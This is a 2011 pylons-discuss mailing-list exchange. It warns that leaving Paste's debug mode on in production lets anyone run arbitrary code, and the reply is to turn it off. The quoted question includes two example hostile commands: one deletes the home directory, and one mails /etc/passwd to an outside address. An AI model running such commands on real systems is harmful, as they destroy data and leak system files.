On Wed, 2011-03-23 at 00:05 -0700, Justin Francis wrote:
> Paste's debug mode is great for debugging, since it allows you to
> execute any python code right on the machine.
>
> debug mode is controlled via a single variable in the server's ".ini"
> file:
>
> [DEFAULT]
> debug = true
>
> remember to set this to false on the production server!
>
> imaging what would happen if you accidentally left this to "true" on
> the production server. now anyone who causes a debug assertion can
> execute ANY code on the host machine. for example, they could type
> "import os; os.system('rm -rf ~);", or "os.system('cat /etc/passwd |
> mail [email protected]');" right into the paste debugger.
>
> is it true, then, that this one line in the config file can cause a
> complete security disaster? this seems like there are not sufficient
> safeguards because it is easy to accidentally forget to properly set
> this variable in the ini file. it gives me nightmares just thinking
> about it.
I think the solution is to turn it off.
> is there a better safeguard? or do all paste websites (such as reddit,
> quora, and so on) share this potential security issue?
They turn the debugger off in production.
- C
--
You received this message because you are subscribed to the Google Groups
"pylons-discuss" group.
To post to this group, send email to [email protected].
To unsubscribe from this group, send email to
[email protected].
For more options, visit this group at
http://groups.google.com/group/pylons-discuss?hl=en.
